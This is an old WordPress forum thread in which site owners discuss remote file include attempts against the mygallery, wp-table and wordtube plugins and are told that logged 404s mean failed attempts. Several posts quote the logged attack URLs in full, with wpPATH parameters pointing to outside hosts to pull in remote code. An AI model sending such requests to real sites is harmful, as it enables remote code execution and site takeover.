remote file include attacks

Mittineague
(@mittineague)

16 years, 12 months ago

Monday 4 30, my error logs showed an attempted RFI attack exploiting the mygallery plugin. The latest version of that plugin fixes that vulnerabilty. However, today I have so far gotten 9 attempts to exploit the wpPATH variable in the wp-table plugin and 1 attempt to use the wpPATH variable in the wordtube plugin. If you use the my-gallery plugin please upgrade now. I do not know if the wp-table and wordtube plugins are in fact vulnerable, but if you use them you may want to temporarily deactivate them until you know for certain that they aren’t a risk.

Viewing 9 replies - 1 through 9 (of 9 total)

discolightning
(@discolightning)

16 years, 10 months ago

I experienced similar problems with the wpTable and fgallery plugins. Hackers had placed phony ebay and Paypal pages in the wp-table folder and did the same with fgallery. Got lots of cool emails from people who turned up on our site after trying to dispute those emails.

cowholio4
(@cowholio4)

16 years, 10 months ago

this plug in should be removed it is definitely vulnerable my sites were attacked by some person in Russia.

whooami
(@whooami)

16 years, 10 months ago

that plugin was updated on may 1, over one month ago – fixing the problem

http://alexrabe.boelinger.com/?page_id=3

Jonathon N
(@imagiscapeca)

16 years, 4 months ago

Problem NOT SOLVED.

Alex may have prevented major damage to my site, but despite having the latest WordTube (1.53), 90% of my “error 404” records are for

http://www.MySite.com/some/path
/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://nemez1s.t35.com/scan/id.txt?

or some other wpPATH to a porn site.

If 90% of my “error 404” records are for this, then I expect there are lots of successful [redirects] to these porn/spam sites.

I moved it to a “test eliminate” subdirectory within plugins, where plugins.php can’t find them, but still I get these 404 results, so I deleted WordTube.

Jonathon N
(@imagiscapeca)

16 years, 4 months ago

Problem still NOT FIXED

I removed wordtube but still 90% of my error log are 404 (not found) errors like:

mydomain.com/category/caregiving//plugins/wordtube/wordtube-button.php?wpPATH=http://216.126.65.86/includes/oo??
mydomain.com/tag//plugins/wordtube/wordtube-button.php?wpPATH=http://216.126.65.86/includes/oo??
mydomain.com//plugins/wordtube/wordtube-button.php?wpPATH=http://216.126.65.86/includes/oo??

This thread is marked “this topic is not a support question”. Can I make it a support question? Or should I re-post it?

(I am using WP 2.3.1 – don’t confuse me with the creator of this thread who used 2.1.3 at the time.)

Can I expect Alex Rabe will see this if I post it here, or should I also post it on his (her?) website? This thread already included the tag ‘wordtube’, but I will now add “Alex Rabe”. Is that necessary? As the plugin owner, registered on wordpress.org/extend/plugins, does Alex automatically get notified of support posts with the tag ‘wordtube’?

whooami
(@whooami)

16 years, 4 months ago

imagiscapeca, 404s are a natural consequence of the Internet. You see those because there are attempts, not because they are being successful.
The 90% you mention in the post above isnt accurate either 🙂

90% of your 404s come from “A”. That means that the other 10% of your 404s come from “B” — not that the other 10% were successful.

And they arent spam sites — theyre exploit attempts.

Jonathon N
(@imagiscapeca)

16 years, 4 months ago

My understanding and questions was based on the following:

I went to one of the linked sites to see if it gave me useful information about this problem – it was a porn site. What is an exploit attempt? Person A tries to access website C through website B, so there is no historical record of a connection between computers A and C? How does that harm my site’s bandwidth, my site’s reputation, …? Have links been posted on the internet which direct people through my site to another site? I expect that is not how this exploit usually happens, but that it is possible.

I didn’t think ‘the other 10% were successful’. I know the other 10% are other 404 errors. I thought, if hundreds of attempts are resulting in errors, are dozens successful – or thousands? So yes,

“you see these because they are attempts, not because they are being successful”

, but how can I know if there are successful exploitations? This is the error log – is there a ‘successful’ log?

Is there code in my site that calls
[currentpage]/plugins/wordtube/wordtube-button.php?wpPATH=[_whatever_]?

I never open wp-content in my browser, so maybe the above path will never match a viable path, but if this exploitation hole exists, surely either this exploiter will smarten up and get a working exploit, or another exploiter will do it.

Why do these exploit attempts always use wordtube / try to use wordtube? I appreciate that wordtube is all about enabling the opening of files on other sites, youtube in particular, so maybe there’s no way around it. But if my other video plugins don’t get exploit attempts, maybe it’s because they don’t have an exploitable hole.

I am grateful for the intention and work and potential of wordtube, but I’m surprised this issue has not been dealt with properly, or at least explained properly.

Thanks for your input.

whooami
(@whooami)

16 years, 4 months ago

A “remote file include” as is the topic of this thread is an exploit — plain and simple.

http://www.google.com/search?hl=en&q=remote++file+include&btnG=Google+Search

Why do these exploit attempts always use wordtube…

the attempts are always including wordtube because the exploit (that was fixed) made it into the wild — that is to say, it’s available to all on the web. Even I see exploit attempts to my blog that are attempting to use that plugin, and I have NEVER used it.

I didn’t think ‘the other 10% were successful’. I know the other 10% are other 404 errors. I thought, if hundreds of attempts are resulting in errors, are dozens successful – or thousands?

No. The plugin was fixed. Trust the author or dont use the plugin. 🙂

..but how can I know if there are successful exploitations? This is the error log – is there a ‘successful’ log?

Yes and no. While there is not a named file, ie a successful.log there are Apache access logs that if read properly, provide more than enough info. Get comfortable with reading your Apache logs.

—

This is what you have to do, and its a hard truth, so take it or leave it. WordPress and some of the plugins that have been written for WordPress occasionally have security issues. A natural consequence of that is that you are bound to see exploit attempts in your logs. As web masters we choose whether or not we want to continue using said software or not. You can delete the plugin, you will probably, assuredly, still see attempts at its use. You could even delete WordPress all together and move to Joomla — you would still see exploit attempts that are geared toward WP or one of its plugins.

I see exploit attempts that are geared toward b2evolution on my blog — I dont use it anymore, and havent for years.

You deal with them, update the software as the author(s) provide fixes. and trust that its fixed. Or dont trust, and dont use the software or the plugins.

Diligence is good, and I am not trying to discourage you from being aware of whats going on on your site — but fretting over 404s is unnecessary. 404s are good in this case.

Jonathon N
(@imagiscapeca)

16 years, 4 months ago

Thank you, whoami. I have re-activated wordtube, and I am at peace.

Should I suggest a summary of this conversation be included in the codex or something? Or perhaps I’ll just hope people with the same question I had will find this page here in the forum.

Viewing 9 replies - 1 through 9 (of 9 total)

The topic ‘remote file include attacks’ is closed to new replies.

remote file include attacks

Tags

Topics

Topics with no replies

Non-support topics

Resolved topics

Unresolved topics

All topics